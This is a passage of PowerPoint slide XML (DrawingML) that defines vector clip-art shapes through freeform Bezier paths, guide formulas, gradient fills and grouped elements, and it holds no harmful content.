                          <a:pt x="124" y="20"/>
                          <a:pt x="94" y="14"/>
                          <a:pt x="81" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="75" y="10"/>
                          <a:pt x="73" y="5"/>
                          <a:pt x="72" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="72" y="19"/>
                          <a:pt x="72" y="18"/>
                          <a:pt x="68" y="19"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="68" y="19"/>
                          <a:pt x="28" y="28"/>
                          <a:pt x="17" y="32"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="7" y="36"/>
                          <a:pt x="2" y="42"/>
                          <a:pt x="1" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="55"/>
                          <a:pt x="0" y="135"/>
                          <a:pt x="1" y="145"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="163"/>
                          <a:pt x="25" y="165"/>
                          <a:pt x="36" y="156"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="153"/>
                          <a:pt x="43" y="149"/>
                          <a:pt x="43" y="145"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="130"/>
                          <a:pt x="42" y="102"/>
                          <a:pt x="42" y="73"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="73"/>
                          <a:pt x="42" y="73"/>
                          <a:pt x="42" y="73"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="73"/>
                          <a:pt x="42" y="72"/>
                          <a:pt x="42" y="72"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="70"/>
                          <a:pt x="42" y="68"/>
                          <a:pt x="42" y="66"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="65"/>
                          <a:pt x="42" y="65"/>
                          <a:pt x="42" y="64"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="64"/>
                          <a:pt x="42" y="63"/>
                          <a:pt x="42" y="63"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="50"/>
                          <a:pt x="48" y="44"/>
                          <a:pt x="59" y="41"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="68" y="37"/>
                          <a:pt x="101" y="30"/>
                          <a:pt x="103" y="30"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="107" y="28"/>
                          <a:pt x="107" y="28"/>
                          <a:pt x="103" y="30"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="101" y="30"/>
                          <a:pt x="68" y="37"/>
                          <a:pt x="59" y="41"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="48" y="44"/>
                          <a:pt x="43" y="50"/>
                          <a:pt x="42" y="63"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="64"/>
                          <a:pt x="42" y="70"/>
                          <a:pt x="42" y="71"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="71"/>
                          <a:pt x="42" y="71"/>
                          <a:pt x="42" y="72"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="72"/>
                          <a:pt x="42" y="74"/>
                          <a:pt x="42" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="77"/>
                          <a:pt x="42" y="77"/>
                          <a:pt x="42" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="154"/>
                          <a:pt x="43" y="154"/>
                          <a:pt x="43" y="154"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="154"/>
                          <a:pt x="43" y="154"/>
                          <a:pt x="43" y="154"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="155"/>
                          <a:pt x="43" y="156"/>
                          <a:pt x="43" y="157"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="180"/>
                          <a:pt x="84" y="177"/>
                          <a:pt x="84" y="157"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="84" y="142"/>
                          <a:pt x="85" y="80"/>
                          <a:pt x="85" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="85" y="74"/>
                          <a:pt x="87" y="70"/>
                          <a:pt x="89" y="69"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="91" y="69"/>
                          <a:pt x="136" y="57"/>
                          <a:pt x="141" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="153" y="52"/>
                          <a:pt x="159" y="47"/>
                          <a:pt x="159" y="25"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="159" y="8"/>
                          <a:pt x="159" y="8"/>
                          <a:pt x="159" y="8"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="159" y="7"/>
                          <a:pt x="159" y="7"/>
                          <a:pt x="159" y="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tx2"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:schemeClr val="tx2">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:schemeClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:schemeClr val="tx2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31" name="Oval 1121">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAA26159-6F3A-4AFD-A75F-B8ABD0E186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gray">
                  <a:xfrm flipH="1">
                    <a:off x="2043" y="1822"/>
                    <a:ext cx="51" cy="52"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:soli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32" name="Freeform 1122">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07507963-44B6-47F2-B754-F82802083D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056" y="1888"/>
                    <a:ext cx="16" cy="76"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 55"/>
                      <a:gd name="T1" fmla="*/ 0 h 265"/>
                      <a:gd name="T2" fmla="*/ 14 w 55"/>
                      <a:gd name="T3" fmla="*/ 22 h 265"/>
                      <a:gd name="T4" fmla="*/ 5 w 55"/>
                      <a:gd name="T5" fmla="*/ 239 h 265"/>
                      <a:gd name="T6" fmla="*/ 29 w 55"/>
                      <a:gd name="T7" fmla="*/ 265 h 265"/>
                      <a:gd name="T8" fmla="*/ 52 w 55"/>
                      <a:gd name="T9" fmla="*/ 253 h 265"/>
                      <a:gd name="T10" fmla="*/ 38 w 55"/>
                      <a:gd name="T11" fmla="*/ 29 h 265"/>
                      <a:gd name="T12" fmla="*/ 55 w 55"/>
                      <a:gd name="T13" fmla="*/ 15 h 265"/>
                      <a:gd name="T14" fmla="*/ 0 w 55"/>
                      <a:gd name="T15" fmla="*/ 0 h 2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5" h="265">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="14" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="5" y="239"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="29" y="265"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="52" y="253"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="38" y="29"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="55" y="1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40505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6350" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:schemeClr val="tx1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33" name="Freeform 1123">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75B6F52B-F757-4446-AD1E-9E288D53EE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052" y="1946"/>
                    <a:ext cx="59" cy="35"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 75 w 91"/>
                      <a:gd name="T1" fmla="*/ 0 h 54"/>
                      <a:gd name="T2" fmla="*/ 28 w 91"/>
                      <a:gd name="T3" fmla="*/ 14 h 54"/>
                      <a:gd name="T4" fmla="*/ 40 w 91"/>
                      <a:gd name="T5" fmla="*/ 46 h 54"/>
                      <a:gd name="T6" fmla="*/ 91 w 91"/>
                      <a:gd name="T7" fmla="*/ 32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1" h="54">
                        <a:moveTo>
                          <a:pt x="75" y="0"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="61" y="4"/>
                          <a:pt x="45" y="8"/>
                          <a:pt x="28" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="22"/>
                          <a:pt x="17" y="54"/>
                          <a:pt x="40" y="46"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="44"/>
                          <a:pt x="66" y="38"/>
                          <a:pt x="91" y="32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50000">
                        <a:schemeClr val="bg1">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:schemeClr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1" name="Group 1124">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C28ABA4D-C4F6-487E-B7F4-13F684E0A9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2253" y="2535"/>
                  <a:ext cx="428" cy="229"/>
                  <a:chOff x="786" y="2382"/>
                  <a:chExt cx="1190" cy="634"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2116" name="Freeform 1125">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACC12A4B-0099-468E-9F81-DCA34C1F94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933" y="2464"/>
                    <a:ext cx="43" cy="322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7" name="Freeform 1126">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91209AAF-87E2-4621-AE2C-516BA2E0D1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888" y="2464"/>
                    <a:ext cx="45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3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8" name="Freeform 1127">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C5E7FA-DA28-4B0E-AA7C-781214A506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038" y="2694"/>
                    <a:ext cx="46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4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4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9" name="Freeform 1128">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24842F89-7E95-4658-AC3F-49F7D92CF8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084" y="2694"/>
                    <a:ext cx="42" cy="322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4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0" name="Freeform 1129">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B446620C-12B6-458F-BBE8-4103AB3972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786" y="2625"/>
                    <a:ext cx="45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3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1" name="Freeform 1130">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C620A826-611E-41A9-A5F7-22506D800F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831" y="2625"/>
                    <a:ext cx="43" cy="322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2" name="Freeform 1131">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA23082D-E70F-4196-BD91-98E0AFEA0C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633" y="2382"/>
                    <a:ext cx="42" cy="325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3" name="Freeform 1132">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D81CA739-303C-4D5E-9F61-CAE6002F81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633" y="2394"/>
                    <a:ext cx="42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4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4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4" name="Freeform 1133">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5E7B52A-2225-4453-85AC-2C68F58DB0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675" y="2394"/>
                    <a:ext cx="46" cy="322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4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5" name="Freeform 1134">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C803768-0617-487B-97D7-CAE2EC7DCB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786" y="2382"/>
                    <a:ext cx="1190" cy="325"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 321"/>
                      <a:gd name="T1" fmla="*/ 65 h 87"/>
                      <a:gd name="T2" fmla="*/ 160 w 321"/>
                      <a:gd name="T3" fmla="*/ 22 h 87"/>
                      <a:gd name="T4" fmla="*/ 160 w 321"/>
                      <a:gd name="T5" fmla="*/ 22 h 87"/>
                      <a:gd name="T6" fmla="*/ 240 w 321"/>
                      <a:gd name="T7" fmla="*/ 0 h 87"/>
                      <a:gd name="T8" fmla="*/ 321 w 321"/>
                      <a:gd name="T9" fmla="*/ 22 h 87"/>
                      <a:gd name="T10" fmla="*/ 240 w 321"/>
                      <a:gd name="T11" fmla="*/ 44 h 87"/>
                      <a:gd name="T12" fmla="*/ 240 w 321"/>
                      <a:gd name="T13" fmla="*/ 44 h 87"/>
                      <a:gd name="T14" fmla="*/ 81 w 321"/>
                      <a:gd name="T15" fmla="*/ 87 h 87"/>
                      <a:gd name="T16" fmla="*/ 0 w 321"/>
                      <a:gd name="T17" fmla="*/ 65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21" h="87">
                        <a:moveTo>
                          <a:pt x="0" y="65"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="160" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="160" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="321" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="44"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="44"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="81" y="87"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="65"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="8E47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6" name="Freeform 1135">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83E23CEC-F4D4-45E0-9262-344077D703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084" y="2464"/>
                    <a:ext cx="892" cy="285"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 241"/>
                      <a:gd name="T1" fmla="*/ 65 h 77"/>
                      <a:gd name="T2" fmla="*/ 0 w 241"/>
                      <a:gd name="T3" fmla="*/ 77 h 77"/>
                      <a:gd name="T4" fmla="*/ 241 w 241"/>
                      <a:gd name="T5" fmla="*/ 12 h 77"/>
                      <a:gd name="T6" fmla="*/ 241 w 241"/>
                      <a:gd name="T7" fmla="*/ 0 h 77"/>
                      <a:gd name="T8" fmla="*/ 0 w 241"/>
                      <a:gd name="T9" fmla="*/ 65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1" h="77">
                        <a:moveTo>
                          <a:pt x="0" y="65"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="77"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="241" y="12"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="241" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="65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7" name="Freeform 1136">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FB514B4-A8B1-45BB-AA03-B4D1C2B72B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786" y="2625"/>
                    <a:ext cx="298" cy="124"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 80"/>
                      <a:gd name="T1" fmla="*/ 0 h 34"/>
                      <a:gd name="T2" fmla="*/ 0 w 80"/>
                      <a:gd name="T3" fmla="*/ 13 h 34"/>
                      <a:gd name="T4" fmla="*/ 80 w 80"/>
                      <a:gd name="T5" fmla="*/ 34 h 34"/>
                      <a:gd name="T6" fmla="*/ 80 w 80"/>
                      <a:gd name="T7" fmla="*/ 22 h 34"/>
                      <a:gd name="T8" fmla="*/ 0 w 80"/>
                      <a:gd name="T9" fmla="*/ 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0" h="34">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="13"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="80" y="34"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="80" y="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02" name="Freeform 1137">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{451CD34D-4FE5-4769-ADEF-889DD03AD09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60" y="2592"/>
                  <a:ext cx="158" cy="42"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 668 w 668"/>
                    <a:gd name="T1" fmla="*/ 76 h 177"/>
                    <a:gd name="T2" fmla="*/ 377 w 668"/>
                    <a:gd name="T3" fmla="*/ 0 h 177"/>
                    <a:gd name="T4" fmla="*/ 0 w 668"/>
                    <a:gd name="T5" fmla="*/ 102 h 177"/>
                    <a:gd name="T6" fmla="*/ 288 w 668"/>
                    <a:gd name="T7" fmla="*/ 177 h 177"/>
                    <a:gd name="T8" fmla="*/ 668 w 668"/>
                    <a:gd name="T9" fmla="*/ 76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8" h="177">
                      <a:moveTo>
                        <a:pt x="668" y="76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77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="668" y="7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03" name="Group 1138">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1A86EC3-C407-41AB-9745-3CE2EFC680A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73" y="2511"/>
                  <a:ext cx="133" cy="89"/>
                  <a:chOff x="1859" y="2279"/>
                  <a:chExt cx="372" cy="247"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="2109" name="Freeform 1139">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19C1EFE7-D684-4D26-8EE9-FE6D7D8A9B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859" y="2412"/>
                    <a:ext cx="372" cy="100"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 25173"/>
                      <a:gd name="T1" fmla="*/ 3378 h 6756"/>
                      <a:gd name="T2" fmla="*/ 12585 w 25173"/>
                      <a:gd name="T3" fmla="*/ 0 h 6756"/>
                      <a:gd name="T4" fmla="*/ 25173 w 25173"/>
                      <a:gd name="T5" fmla="*/ 3378 h 6756"/>
                      <a:gd name="T6" fmla="*/ 12585 w 25173"/>
                      <a:gd name="T7" fmla="*/ 6756 h 6756"/>
                      <a:gd name="T8" fmla="*/ 0 w 25173"/>
                      <a:gd name="T9" fmla="*/ 3378 h 67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5173" h="6756">
                        <a:moveTo>
                          <a:pt x="0" y="3378"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="12585" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="25173" y="3378"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12585" y="6756"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="3378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969696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0" name="Freeform 1140">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6AB96BD-DBB2-4A37-8600-3F8CB86960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045" y="2462"/>
                    <a:ext cx="186" cy="64"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 12588"/>
                      <a:gd name="T1" fmla="*/ 3378 h 4342"/>
                      <a:gd name="T2" fmla="*/ 0 w 12588"/>
                      <a:gd name="T3" fmla="*/ 4342 h 4342"/>
                      <a:gd name="T4" fmla="*/ 12588 w 12588"/>
                      <a:gd name="T5" fmla="*/ 964 h 4342"/>
                      <a:gd name="T6" fmla="*/ 12588 w 12588"/>
                      <a:gd name="T7" fmla="*/ 0 h 4342"/>
                      <a:gd name="T8" fmla="*/ 0 w 12588"/>
                      <a:gd name="T9" fmla="*/ 3378 h 43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588" h="4342">
                        <a:moveTo>
                          <a:pt x="0" y="3378"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="4342"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12588" y="964"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12588" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="3378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 w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="80808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1" name="Freeform 1141">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAC9F986-5870-4F2F-BF35-DA3B4DD83D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859" y="2462"/>
                    <a:ext cx="186" cy="64"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 12585 w 12585"/>
                      <a:gd name="T1" fmla="*/ 4342 h 4342"/>
                      <a:gd name="T2" fmla="*/ 0 w 12585"/>
                      <a:gd name="T3" fmla="*/ 964 h 4342"/>
                      <a:gd name="T4" fmla="*/ 0 w 12585"/>
                      <a:gd name="T5" fmla="*/ 0 h 4342"/>
                      <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                      <a:gd name="T7" fmla="*/ 3378 h 4342"/>
                      <a:gd name="T8" fmla="*/ 12585 w 12585"/>
                      <a:gd name="T9" fmla="*/ 4342 h 43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585" h="4342">
                        <a:moveTo>
                          <a:pt x="12585" y="4342"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="964"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12585" y="3378"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12585" y="434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2" name="Freeform 1142">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50980425-34DD-4068-A200-55AADBFBEF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912" y="2428"/>
                    <a:ext cx="252" cy="68"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 17020"/>
                      <a:gd name="T1" fmla="*/ 1711 h 4567"/>
                      <a:gd name="T2" fmla="*/ 10647 w 17020"/>
                      <a:gd name="T3" fmla="*/ 4567 h 4567"/>
                      <a:gd name="T4" fmla="*/ 17020 w 17020"/>
                      <a:gd name="T5" fmla="*/ 2859 h 4567"/>
                      <a:gd name="T6" fmla="*/ 6371 w 17020"/>
                      <a:gd name="T7" fmla="*/ 0 h 4567"/>
                      <a:gd name="T8" fmla="*/ 0 w 17020"/>
                      <a:gd name="T9" fmla="*/ 1711 h 45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7020" h="4567">
                        <a:moveTo>
                          <a:pt x="0" y="1711"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="10647" y="4567"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="17020" y="2859"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="6371" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1711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C0C0C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3" name="Freeform 1143">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4F18288-B33A-4BA1-9EF4-97EF85925A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859" y="2283"/>
                    <a:ext cx="186" cy="243"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 12585"/>
                      <a:gd name="T1" fmla="*/ 0 h 16411"/>
                      <a:gd name="T2" fmla="*/ 0 w 12585"/>
                      <a:gd name="T3" fmla="*/ 13033 h 16411"/>
                      <a:gd name="T4" fmla="*/ 12585 w 12585"/>
                      <a:gd name="T5" fmla="*/ 16411 h 16411"/>
                      <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                      <a:gd name="T7" fmla="*/ 3378 h 16411"/>
                      <a:gd name="T8" fmla="*/ 0 w 12585"/>
                      <a:gd name="T9" fmla="*/ 0 h 16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585" h="16411">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="13033"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12585" y="16411"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12585" y="337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969696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4" name="Freeform 1144">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6EFAE4F-016F-4183-A72B-BBE256C784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045" y="2329"/>
                    <a:ext cx="14" cy="197"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 971"/>
                      <a:gd name="T1" fmla="*/ 13293 h 13293"/>
                      <a:gd name="T2" fmla="*/ 971 w 971"/>
                      <a:gd name="T3" fmla="*/ 13030 h 13293"/>
                      <a:gd name="T4" fmla="*/ 971 w 971"/>
                      <a:gd name="T5" fmla="*/ 0 h 13293"/>
                      <a:gd name="T6" fmla="*/ 0 w 971"/>
                      <a:gd name="T7" fmla="*/ 260 h 13293"/>
                      <a:gd name="T8" fmla="*/ 0 w 971"/>
                      <a:gd name="T9" fmla="*/ 13293 h 132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71" h="13293">
                        <a:moveTo>
                          <a:pt x="0" y="13293"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="971" y="13030"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="971" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="260"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="13293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 w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="80808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5" name="Freeform 1145">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A825E926-D107-4534-97B6-06EC03654C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859" y="2279"/>
                    <a:ext cx="200" cy="54"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 13556 w 13556"/>
                      <a:gd name="T1" fmla="*/ 3378 h 3638"/>
                      <a:gd name="T2" fmla="*/ 12585 w 13556"/>
                      <a:gd name="T3" fmla="*/ 3638 h 3638"/>
                      <a:gd name="T4" fmla="*/ 0 w 13556"/>
                      <a:gd name="T5" fmla="*/ 260 h 3638"/>
                      <a:gd name="T6" fmla="*/ 971 w 13556"/>
                      <a:gd name="T7" fmla="*/ 0 h 3638"/>
                      <a:gd name="T8" fmla="*/ 13556 w 13556"/>
                      <a:gd name="T9" fmla="*/ 3378 h 36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556" h="3638">
                        <a:moveTo>
                          <a:pt x="13556" y="3378"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="12585" y="3638"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="260"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="971" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="13556" y="3378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C0C0C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4" name="Group 1146">
                  <a:extLst>
